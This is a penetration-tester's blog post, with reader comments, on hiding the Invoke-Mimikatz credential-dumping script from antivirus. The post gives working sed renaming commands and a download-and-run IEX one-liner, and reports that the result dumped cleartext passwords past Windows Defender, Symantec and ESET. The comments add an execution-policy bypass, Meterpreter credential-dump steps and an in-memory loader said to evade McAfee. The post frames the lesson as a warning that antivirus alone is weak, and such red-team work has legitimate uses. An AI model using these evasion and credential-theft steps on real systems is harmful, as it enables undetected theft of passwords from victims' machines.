How to Bypass Anti-Virus to Run Mimikatz
Carrie Roberts // *
Would you like to run Mimikatz without Anti-Virus (AV) detecting it? Recently I attempted running the PowerShell script “Invoke-Mimikatz” from PowerSploit on my machine but it was flagged by Windows Defender as malicious when saving the file to disk. Even when I ran this file without writing it to disk using the following command it still got caught.
powershell "IEX (New-Object Net.WebClient).DownloadString ('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz"
Uploading the Invoke-Mimikatz.ps1 file to VirusTotal showed that 19 of 54 AV vendors currently detect this file as malicious.
While uploading to VirusTotal is not a conclusive way to determine if a malicious file will be detected, it can hint to what AV may be triggering on.
As you may know, AV detection schemes can be weak, simply looking for specific words in the file. Often these words can be changed without changing the functionality. For example, changing “Invoke-Mimikatz” to “Invoke-Mimidogz” using the following Linux command brings the detection rate down to 8 of 54
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
And how about getting rid of those unnecessary comments in the script?
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
We are down to four (4) AV vendors detecting the malicious file after renaming “Katz” to “Dogz” and removing comments. A little further experimentation shows that AV doesn’t like the word “DumpCreds”, let’s change it to “DumpCred”.
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
We could probably quit here and get a lot of mileage out of this script, but as my daughter would say after reading the disclaimer on hand sanitizer, “Why don’t they just put a little bit more in and kill ‘em all!?”
So let’s do this. Just add three more match and replace rules and “Winner, winner, chicken dinner!” The complete list of match and replace commands is listed below.
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1 sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1
We took this modified Mimikatz file and ran it against systems running up-to-date versions of Windows Defender, Symantec, and ESET. (Thanks to Brian Fehrman and David Fletcher). We were able to run the script to dump cleartext passwords from memory and it was not detected by AV.
We successfully modified the Mimikatz script to avoid AV detection without changing the functionality. Great evidence to why you should not rely solely on your AV for protection.
*This post is part of the bigger “Sacred Cash Cow Tipping” series about bypassing AV, particularly our most recent episode found here.
You can learn more from Carrie in her classes!
Check them out here:
Attack Emulation Tools: Atomic Red Team, CALDERA and More
Available live/virtual and on-demand!
Jerry
January 5, 2017 @ 11:21 am
Would it be possible to do something like this to the Mimikatz modules inside the Empire framework?
Carrie Roberts
January 5, 2017 @ 7:15 pm
Hi Jerry, Yes it would, or, because Empire lets you run any PowerShell you want, you can have it import your modified Mimikatz script using the “scriptimport ./path/” command and then call your version of Invoke-Mimikatz using the “scriptcmd” command. See the bottom paragraph of this page of the Empire manual http://www.powershellempire.com/?page_id=110 and here for some examples of its use: https://warroom.securestate.com/leveraging-ms16-032-powershell-empire/
Manu
January 6, 2017 @ 9:12 am
Which were the last 2 anti-virus?
Carrie Roberts
January 6, 2017 @ 10:16 am
ESET-NOD32 and Rising
Jonathan
January 20, 2017 @ 11:49 am
Awesome post, Carrie. Quick question: What was the PowerShell execution policy set to on your test machine?
Carrie Roberts
January 23, 2017 @ 8:21 am
My execution policy was “Restricted” but I used the “powershell -exec bypass” command to allow me to run the Mimikatz script. This sets the execution policy to “Bypass” for the current session and allows running the script.
Phil Ivey
March 14, 2017 @ 10:03 am
Why don’t you just use reflective DLL injection to run mimikatz from memory? There’s no need to do any of this.
Carrie Roberts
March 14, 2017 @ 11:01 am
Hi Phil, somewhat surprisingly, that solution by itself does not work against Windows Defender. Give it a try . . .
Phil Ivey
March 14, 2017 @ 12:51 pm
It certainly does work – I do it regularly. Both Metasploit and Empire do it out-of-the-box.
1. Get session
2. msf> sessions -i 1
3. meterpreter> getsystem
4. meterpreter> load kiwi
5. meterpreter> creds_all
The approach is similar in Empire, don’t remember the commands off the top of my head.
Carrie Roberts
March 14, 2017 @ 6:29 pm
I was referring to this: powershell “IEX (New-Object Net.WebClient).DownloadString
(‘https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1’);Invoke-Mimikatz” as I was looking for a solution that did not require a Meterpreter or Empire session which can often be an additional hurdle to overcome.
Phil Ivey
March 14, 2017 @ 6:51 pm
To each her own I guess… seems like manually obfuscating PowerShell code is a bigger hurdle than just catching a session and using DLL injection. If you can fetch a file from GitHub, you can establish a Meterpreter/Empire session too.
Quentin
March 27, 2017 @ 5:21 am
Hi,
Is it possible to use this modified powershell script and to convert it into an exe file ? If so, can you tell me how will you process please ?
Thank you.
Carrie Roberts
March 27, 2017 @ 8:55 am
Hi Quentin,
Give this a try for converting PowerShell to an executable:
https://gallery.technet.microsoft.com/PS2EXE-Convert-PowerShell-9e4e07f1
Miguel
April 11, 2017 @ 8:16 pm
Hi Carrie, is this process now out of date? My detection ratio was 14/56 after I executed the match and replace commands. Thanks
Carrie Roberts
April 12, 2017 @ 10:06 am
Hi Miguel, yes. The AV vendors have made additional changes after this post came out such that it doesn’t work as specified. Although, I have experimented with it again and found that many of the AV vendors still look for static words in the file, just different ones than I’ve published. Some trial and error may be in order to figure out what needs to change.
Tony G
July 25, 2017 @ 2:11 pm
Why use IEX? The script below goes straight into memory without calling Internet Explorer (which may be way Defender is catching it). This gets past McAfee without incident:
$uri = ‘https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1’
# Get the script code:
$functionCode = Invoke-RestMethod -Method Get -Uri $uri
# El perro, el perro, es mi corazón, El gato, el gato, el gato no es bueno.
$mimidogzCode = $functionCode -replace “Invoke-Mimikatz”, “Invoke-Mimidogz”
# Instantiate a ScriptBlock passing the
# source code to the constructor:
$mimidogz = [ScriptBlock]::Create($mimidogzCode)
# Load it into memory:
. $mimidogz
# Done!
Invoke-Mimidogz
Jeff
July 31, 2017 @ 11:01 am
I can’t get the PowerShell you used above to work 🙁
If I simply copy and paste I get
string : The term ‘string’ is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:23
+ string DownloadString(string address), string DownloadString(uri addr …
+ ~~~~~~
+ CategoryInfo : ObjectNotFound: (string:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
It in manually it still fails to execute and it’s on a box with no AV of any kind. What am I missing 🙂
Wombat Hunter
July 31, 2017 @ 1:11 pm
What specific piece did you copy and paste? It sounds like you either copy and pasted wrong or your PowerShell environment is jacked.
Jeff
August 1, 2017 @ 12:27 pm
It was a PowerShell that was jacked up. Spent about 2 hours fighting with it until I decided to build a fresh box and then it worked. Talk about wow…